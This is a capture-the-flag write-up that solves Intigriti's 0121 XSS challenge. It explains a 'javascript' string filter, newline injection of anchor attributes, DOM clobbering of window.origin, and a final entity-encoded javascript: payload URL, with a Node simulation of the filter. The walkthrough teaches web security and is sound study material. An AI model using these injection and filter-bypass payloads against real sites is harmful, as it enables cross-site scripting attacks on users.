Solution for Intigriti’s 0121 challenge

Time to investigate

Let’s dig into the source code to figure out what’s going on. The page loads the script script.js (you can find the whole script at the bottom of the post). The part that matters is a filter that runs over the global objects and does the following:

  1. Loop over the two strings ‘document’ and ‘window’ (the names under which the two objects are looked up)
  2. Loop over all the properties of the object with that name
  3. Check whether the property’s value is of type ‘string’
  4. If it is, check whether that string contains the substring ‘javascript’
  5. If it does, delete the property
https://challenge-0121.intigriti.io/?r=https://example.com

Try harder

The weird filtering functionality seems interesting, so let’s take a closer look at it. Which properties of document and window are even available and of type ‘string’? Let’s quickly modify the code a bit to list them all for us. Something like this will work:
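As an added example (not the challenge’s own script.js), here is a Node-runnable model of the five filter steps above together with the kind of lister the text calls for. The window and document objects are constructed stand-ins with a handful of properties (a real browser has far more, which is exactly why listing them helps), and makeGlobals, listStringProps and stripJavascriptStrings are names chosen here. The stand-in keeps one browser detail on purpose: document.URL lives as an accessor on the prototype, while window’s attributes are own properties of the window object.

```javascript
// Added example, not the challenge's script.js. Constructed stand-ins for
// window and document so the filter can be exercised under Node.
function makeGlobals(pageUrl) {
  // In a real browser, Document attributes such as URL are accessors on
  // Document.prototype, not own properties of `document`. Model that with an
  // enumerable getter on a prototype object.
  const documentProto = {};
  Object.defineProperty(documentProto, 'URL', {
    get() { return pageUrl; }, enumerable: true, configurable: true,
  });
  const document = Object.create(documentProto);
  document.title = 'Intigriti 0121';

  // Window is a [Global] interface, so its attributes (origin, name, status,
  // ...) are own properties of the window object itself. That is what makes
  // `delete window.origin` effective.
  const window = {
    origin: new URL(pageUrl).origin,
    name: '',
    status: '',
    innerWidth: 1280,
    document,
  };
  window.window = window;
  return window;
}

// The lister: every enumerable property (own or inherited) of `obj` whose
// value is a string, in for...in order.
function listStringProps(obj) {
  const out = [];
  for (const prop in obj) {
    if (typeof obj[prop] === 'string') out.push(prop);
  }
  return out;
}

// Steps 1-5 from the text: for each of the names 'document' and 'window',
// delete every string-valued property whose value contains 'javascript'.
// Returns what the filter tried to delete and what actually disappeared.
function stripJavascriptStrings(window) {
  const attempted = [];
  const removed = [];
  for (const name of ['document', 'window']) {
    const obj = window[name];
    for (const prop in obj) {
      if (typeof obj[prop] === 'string' && obj[prop].includes('javascript')) {
        delete obj[prop];
        attempted.push(`${name}.${prop}`);
        // `delete` on an inherited accessor returns true but changes nothing,
        // so check whether the property is really gone.
        if (!(prop in obj)) removed.push(`${name}.${prop}`);
      }
    }
  }
  return { attempted, removed };
}

// Stand-alone run: compare the plain origin with the 'javascript' subdomain.
for (const url of [
  'https://challenge-0121.intigriti.io/?r=https://example.com',
  'https://javascript.challenge-0121.intigriti.io/?r=bla',
]) {
  const w = makeGlobals(url);
  console.log(url);
  console.log('  string props on window:', listStringProps(w));
  console.log('  string props on document:', listStringProps(w.document));
  console.log('  filter result:', stripJavascriptStrings(w), '-> window.origin =', w.origin);
}
```

On the plain challenge origin nothing matches; on the javascript subdomain the filter tries to delete both document.URL and window.origin, but only window.origin is really removed, because document.URL is inherited from the prototype and survives a delete on the instance. That surviving own-property/inherited-property distinction is the detail the rest of the write-up relies on.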

Try harder I said - Or just be lucky

After doing some thorough cool hacking analysis - or maybe just spraying some random payloads at the page - I got something interesting:

https://challenge-0121.intigriti.io/?r=bla%0ahihi

Wrapping it together - DOM clobbering FTW

So now we know two things: a newline (%0a) in r lets us set arbitrary attributes on the anchor tag, and any string property of window whose value contains ‘javascript’ gets deleted, window.origin included. Could we chain these discoveries together? Of course we can! What happens if we set an id attribute with the value origin on the anchor tag while visiting the page on the subdomain https://javascript.challenge-0121.intigriti.io, whose origin contains ‘javascript’ and therefore gets window.origin deleted? The answer is magic. Or maybe just DOM clobbering… Yeah, it’s definitely just DOM clobbering: once the real window.origin property is gone, a lookup of origin falls through to named property access on window, which returns the element whose id is origin, and an anchor element stringifies to its href. Let’s try something like https://javascript.challenge-0121.intigriti.io/?r=bla%0aid=origin :

https://javascript.challenge-0121.intigriti.io/?r=bla%0aid=origin

Payload time

Now we’re finally ready to craft our final payload and pop the alert box!

https://javascript.challenge-0121.intigriti.io/?r=j%26%23x41;vascript:alert(flag.innerText);//%0aid=origin
  1. https://javascript.challenge-0121.intigriti.io/
    Use the ‘javascript’ subdomain so that the origin string contains ‘javascript’ and the filter deletes window.origin
  2. ?r=j%26%23x41;vascript:
    Use encoding to bypass the filter: %26%23 URL-decodes to &#, so the parameter reads j&#x41;vascript: and neither the page URL nor the decoded parameter contains the literal substring ‘javascript’. The browser’s HTML parser turns &#x41; back into A when the anchor markup is parsed, leaving a javascript: href
  3. alert(flag.innerText);//
    Alert the flag
  4. %0aid=origin
    Set the id of the anchor tag to origin so that the element clobbers the deleted window.origin

Notes:
  1. You may have noticed that display is eventually set to block, but this only happens 1 second after the 5 second delay for the redirect. This means that if our browser redirects us to the target location in less than a second, we will never see the change.
  2. If you didn’t catch my thick sarcastic tone, let me be clear: I discovered this by coincidence. But that’s totally ok. That can be part of the process when doing challenges and even bug bounty hunting.
